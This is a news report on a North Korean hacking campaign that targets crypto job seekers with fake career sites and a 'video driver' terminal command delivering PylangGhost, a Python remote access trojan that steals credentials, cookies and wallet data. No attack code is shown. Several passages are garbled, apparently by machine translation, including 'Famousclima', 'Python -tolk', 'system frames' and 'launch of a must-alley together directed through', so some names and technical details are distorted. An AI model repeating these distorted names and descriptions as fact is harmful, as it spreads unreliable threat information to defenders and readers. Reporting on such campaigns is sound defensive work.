A North Korean hacking group is targeting crypto workers with a Python-based malware disguised as part of a false job application process, researchers at Cisco Talos said earlier this week.
Most victims appear to be based in India, according to Open Source signals, and appear to be people with past experience in blockchain and cryptocurrency startups.
While Cisco does not report any evidence of internal compromise, the wider risk remains clear: that these efforts are trying to access the companies that these individuals can eventually join.
Malware, called Pylangghost, is a new variant of the previously documented Golangghost Remote Access Trojan (Rat) and shares most of the same features – just rewritten in Python to better target Windows Systems.
Mac users are still affected by the Golang version, while Linux systems appear to be unaffected. The threat actor behind the campaign, known as Famousclima, has been active since mid-2024 and is believed to be a DPRK-adapted group.
Their latest attack vector is simple: imitation of top crypto companies such as Coinbase, Robinhood and Uniswap through highly polished fake career sites and lure software engineers, marketers and designers to finish staged “skill test.”
When a target fills in basic information and answers technical questions, they are asked to install fake video drivers by inserting a command into their terminal that is quietly downloading and launching the Python-based rat.
The payload is hidden in a ZIP file that includes the renamed Python -tolk (nvidia.py), a Visual Basic script for unpacking the archive and six core modules responsible for persistence, system fingerprints, file transfer, external shell access and browser data -theft.
The rat draws login -credentials, session cookies and wallet data from over 80 extensions, including metamask, phantom, thronelink and 1password.
The command kit allows full remote control of infected machines, including file uploads, downloads, system frames and launch of a must-alley together directed through RC4 encrypted HTTP packages.
RC4 encrypted HTTP packages are data sent over the Internet encrypted using an outdated encryption method called RC4. Although the connection itself is not secure (HTTP), the data inside is encrypted but not very good as RC4 is outdated and easily broken by today’s standards.
Despite being a rewrite, the structure and naming conventions of Pylangghost mirror of Golangghost were almost accurate, which suggested that both were probably written by the same operator, Cisco said.
Read more: North Korean hackers aimed at crypto developers with US Shell Company
